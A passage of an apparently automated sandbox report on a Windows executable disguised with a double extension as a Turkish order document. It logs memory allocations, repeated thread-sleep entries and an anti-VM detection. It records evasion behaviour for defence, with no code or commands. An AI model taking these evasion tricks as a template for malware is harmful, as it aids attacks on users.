                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 320, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: CE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 44C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 7350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 6D40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 8350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 9350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598030Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597371Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596936Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596827Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596276Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6911Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2391Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 1986Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 7867Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow / User API: foregroundWindowGot 1755Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7708Thread sleep count: 1986 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7708Thread sleep count: 7867 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -598030s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597371s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -597046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596936s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596827s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596276s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596171s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -596062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595624s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -594968s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7660Thread sleep time: -594859s >= -30000sJump to behavior
